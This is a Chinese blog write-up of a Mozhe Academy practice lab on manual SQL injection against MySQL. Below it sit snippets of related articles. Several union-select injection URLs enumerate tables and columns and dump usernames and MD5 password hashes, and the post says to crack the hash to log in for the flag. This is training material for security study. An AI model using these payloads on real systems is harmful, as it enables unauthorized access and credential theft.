[墨者学院]SQL手工注入漏洞测试(MySQL数据库)

最新推荐文章于 2025-12-05 18:26:01 发布

原创最新推荐文章于 2025-12-05 18:26:01 发布 · 2.4k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#mysql #数据库 #sql

靶场专栏收录该内容

1 篇文章

订阅专栏

在这里插入图片描述
必知知识：
数据库版本：version()
数据库名：database()
数据库用户：user()
操作系统：@@version_compile_os

information_schema.tables：记录所有表名信息的表
information_schema.column：记录所有列名信息的表
table_name：表名
column_name：列名
table_schema：表名
在这里插入图片描述
点击登录下面通知进入

在这里插入图片描述
在网址随便输入判断是否存在注入点

通过输入order by x进行判断字段数
在这里插入图片描述
将前面进行报错执行后面内容，查询输入

得到数据库库名

获取表名

http://219.153.49.228:44553/new_list.php?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'#

在这里插入图片描述
获取列名：

http://219.153.49.228:44553/new_list.php?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='StormGroup_member'#

在这里插入图片描述
得到数据

http://219.153.49.228:44553/new_list.php?id=-1 union select 1,2,group_concat(name,password),4 from StormGroup_member#

在这里插入图片描述

将得到的代码进行MD5解密登录账户获取flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

方聚

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

墨者SQL手工注入漏洞测试(MySQL数据库)思路

weixin_50847719的博客

01-22

668

师从小迪,刚看完sql注入,印象最深刻就是小迪师傅到第四天了打火机依旧没油,咔嚓咔嚓打不着火进入寻找注入点看这 http://219.153.49.228:47589/new_list.php?id=1 判断注入,老办法and 1 = 1和and 1=2 http://219.153.49.228:47589/new_list.php?id=1%20and%201=2 下面该数据库有几个字段(列名数量) order by x id=1 order by x http://219.153.

墨者学院HTTP头注入漏洞测试(X-Forwarded-for)

qq_43817824的博客

07-24

1322

打开靶场环境，查看网页源代码，发现flag.php是进入墨者的任性首页。设置网页代理，进入墨者的任性网页，打开Burp Suite ，抓包，右键发送给repeater，自己填入X-Forwarded-For，然后判断是否可注入。 3.order by 判断表数量，最后发现是4 4.union select 1,2,3,4测试其注入点的位置是在4，通过union select 1,2,3,(...

参与评论您还未登录，请先登录后发表或查看评论

《墨者学院——SQL手工注入漏洞测试(MySQL数据库)》

weixin_47118413的博客

06-21

3194

背景介绍安全工程师"墨者"最近在练习SQL手工注入漏洞，自己刚搭建好一个靶场环境Nginx+PHP+MySQL，PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

墨者学院mysql注入_【墨者学院】：HTTP头注入实战（host注入）

weixin_36176546的博客

01-19

477

0x00.题目描述：背景介绍安全工程师"墨者"最近在练习MySQL头部注入漏洞，自己刚搭建好一个靶场环境PHP+MySQL。尽情的练习SQL注入吧。实训目标1、掌握SQL注入原理；2、了解手工注入的方法3、了解MySQL的数据结构；4、了解HTTP头部注入；解题方向HTTP头部(HOST注入)0x01.解题思路：靶场环境：主界面墨者网页手动检测注入点：测试行数：联合注入，首先测出是具体哪几行会出现...

墨者学院-SQL注入漏洞测试(HTTP头注入)

JimWu的博客

09-04

1406

SQL注入漏洞测试(HTTP头注入) 难易程度:★★ 题目类型:SQL注入使用工具:FireFox浏览器、burpsuite 1.打开靶场，使用burpsuite访问网页，截包。 2.把包send to repeater，根据题目为host注入，把host改为or 1=1，报错，证明存在注入。 3.输入union select 1,2,3,4 查看回显位置。 4.输入union select...

墨者学院SQL手工注入漏洞测试（mysql数据库）

haihaihappy的博客

04-02

587

须知知识点：在mysql5.0版本以上，存在一个information_schema数据库，存储记录数据库名、表名、列名的数据库 相当于可以通过information_schema这个数据库获取到数据库下面的表名和列名。接下来需要把它们全部查询出来（注：需要页面显示错误参数，我们这边5是错误所以id=5）查询到一个MD5值，去解密一下，回来发现密码不对。测试完发现只有1-4显示正常，5显示错误，证明名字段数只有4个。结果发现存在进入数据库查询数据，需要检测列名字段数量。通过列名查询指定数据库数据。

墨者学院 SQL手工注入漏洞测试(MySQL数据库)

qq_48368964的博客

07-22

571

id=1 order by 5 回显异常，说明有四列字段。id=1 order by 1 回显正常。由于为root用户，所以可以高权限访问其他的数据库信息，可跨库查询信息，同一个服务器下的不同站点中的数据库均可查看。接下来进行信息收集，收集数据库的信息：操作系统，数据库名，数据库的用户，数据库的版本等。直接在可控变量后面随便输入值，看回显效果，回显不正常，可能存在SQL注入。观察url信息，为GET请求，存在可控变量，验证是否存在SQL注入。1 and 1=2 回显不正常，可能存在SQL注入。

墨者：SQL手工注入漏洞测试(MySQL数据库-字符型)

qq_62000508的博客

07-28

606

本文详细介绍了MySQL字符型SQL注入技术，分为手工注入和工具利用(sqmap)两种方式。手工注入部分通过靶场实例演示了从判断字段数、确定回显位到获取数据库信息的完整流程，重点讲解了字符型注入的特殊闭合方法。sqlmap部分则展示了自动化测试的各项参数使用技巧。文章通过对比表分析了两者的优缺点，最后强调该技术仅用于安全学习。全文包含大量SQL语句示例和截图说明，适合网络安全学习者系统了解SQL注入原理与实践。

墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型)

2303_81096390的博客

08-02

684

进入靶场环境，点击登录框下面的那一串流动的字符进入具体的注入点页面查看url，发现有可变的参数?id=,此处为字符型注入sql注入分为字符型注入和数字型注入，两者有什么区别呢，简单来说就是字符型注入需要闭合，而数字型注入不需要闭合具体解释：为什么字符型需要闭合，数字型不需要？

【墨者学院】SQL手工注入漏洞测试(MySQL数据库)

muyuchen110的博客

07-22

607

安全工程师"墨者"最近在练习SQL手工注入漏洞，自己刚搭建好一个靶场环境Nginx+PHP+MySQL，PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

记一篇墨者学院SQL手工注入漏洞测试(MySQL数据库)write up

2403_87248548的博客

05-16

1291

最后再把整体的一个思维导图放下面给大家看一下吧！我把整个流程一次从左到右依次列了出来希望对大家有所帮助！

墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)

Lollipop_zhi的博客

02-26

2418

1.启动靶场环境，老地方点击 2.看地址栏，合理怀疑是否有注入点这里插入知识点——怎么判断有注入点？一般方法： and 1=1 正常 and 1=2 错误背后的原理是逻辑运算真且真=真；真且假=假所以只需要让它能判断出假，就可以合理怀疑存在注入点比如：id=jhfjkashlk（瞎打的）改成 id=jhdak 显示异常，有注入点 3.尝试简单使用order by 猜解列名数量，不成功 order by 之后我才判断了单引号闭合，也就是id=tingjigon

墨者 - SQL手工注入漏洞测试(MySQL数据库)

吃肉唐僧的博客

07-02

817

/new_list.php?id=1 and 1=1，判断id的类型值是数字类型 /new_list.php?id=1 order by 4，测出数据库有4个字段，第5个不回显测出页面回显位置 2和3 /new_list.php?id=1 and 1=2 union select 1,2,3,4 爆库 /new_list.php?id=1 and 1=2 uni...

墨者 - SQL注入漏洞测试(HTTP头注入)

吃肉唐僧的博客

07-07

2659

手动判断注入点判断字段判断表名union select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database...

Linux（CentOS）安装 MySQL

2509_94088022的博客

11-29

876

CentOS版本：CentOS 7三种安装方式：一、通过 yum 安装，最简单，一键安装，全程无忧。二、通过 rpm 包安装，需具备基础概念及常规操作。三、通过 gz 包安装，需具备配置相关操作。

【JAVA】AES加密

随笔

12-03

275

【JAVA】AES加密

mysql_mcp_server部署及应用案例

最新发布

runfarther的专栏

12-05

233

本文介绍了在CentOS 7.5系统下安装和部署mysql_mcp_server的完整流程。主要包括三个部分：1）服务安装步骤，包括源码下载、创建独立Python环境及安装依赖包；2）服务配置方法，涉及创建配置文件、设置监听端口和MySQL数据库连接参数；3）服务启动命令。整个过程详细说明了从环境准备到服务运行的全套操作，为在CentOS系统上部署该MySQL管理服务提供了清晰的指导。

《零基础学PHP：从入门到实战》教程-模块七：MySQL 数据库基础-4

zwh821的博客

12-03

605

PHP连接MySQL数据库操作指南本章介绍了使用PHP的mysqli扩展连接和操作MySQL数据库的核心方法。主要内容包括：两种编程风格：面向对象和面向过程方式，推荐使用面向对象风格 数据库连接：建立连接的标准流程和必要的错误处理 SQL操作： SELECT查询及结果处理 INSERT/UPDATE/DELETE操作安全防护：重点讲解SQL注入攻击原理演示不安全的字符串拼接方式的风险推荐使用预处理语句（prepare/bind_param/execute）作为唯一正确的防护手段通过代码示例展示

mysql运维（日志）

weixin_74390886的博客

12-03

264

慢查询日志记录了所有执行时间超过参数long_query_time设置值并且扫描记录数不小于min_examined_row_limit的所有的sql语句的日志，默认未开启。可以使用log_slow_admin_statements和更改此行为log_queries_not_using_indexes。查询日志中记录了客户端的所有操作语句，而二进制日志不包含查询数据的sql语句。在二进制日志记录了所有的DDL(数据定义语言）语句和DML(数据操纵语言）语句，但不包括数据查询语句。

墨者学院SQL手工注入漏洞测试(MySQL数据库)

12-29

### MySQL数据库中的SQL手工注入漏洞测试方法 #### 测试前准备为了安全有效地进行SQL注入测试，建议在一个受控环境中操作。通常会搭建一个包含Nginx、PHP以及MySQL的靶场环境，在此环境下可以自由尝试各种攻击向量而不会影响生产数据。 #### 获取当前使用的数据库名称通过构造特定查询语句来获取正在使用的数据库名是一个常见的起点。例如，可以通过访问`/new_list.php?id=-1 union select 1,database(),3,4`这样的URL路径实现这一点[^3]。这将返回当前连接到的应用程序所使用的具体数据库的名字。 #### 列出所有可用表格一旦知道了具体的数据库名字之后，下一步就是找出该数据库中存在的所有表单。利用如下所示的HTTP请求字符串即可完成这一目的:`/new_list.php?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security'),3 -- -` 。这里假设已知的安全数据库名为'security'[^2]。请注意实际应用时应替换为之前获得的确切数据库名称。 #### 探索选定表内的列详情当掌握了感兴趣的表的信息后，则可进一步探索这些表内部的具体结构——即它们各自拥有的字段列表。对于每一个想要了解其组成的表而言，都可以执行类似于下面这条命令的操作（以users为例）： ```sql /new_list.php?id=-1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),DATABASE(),4 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users' ``` #### 提取敏感信息最后一步是从确认过的表里读取出有用的数据项。比如要查看用户账号及其密码哈希值的话，就可以发送像这样格式化的GET请求给服务器端口： ```sql /new_list.php?id=-1 UNION SELECT 1,username,password,DATABASE() FROM users-- ``` 以上过程展示了如何逐步深入挖掘潜在存在的SQL注入缺陷并从中提取有价值的情报。然而值得注意的是，上述技术仅适用于教育用途下的合法渗透测试活动；未经授权擅自入侵他人信息系统属于违法行为！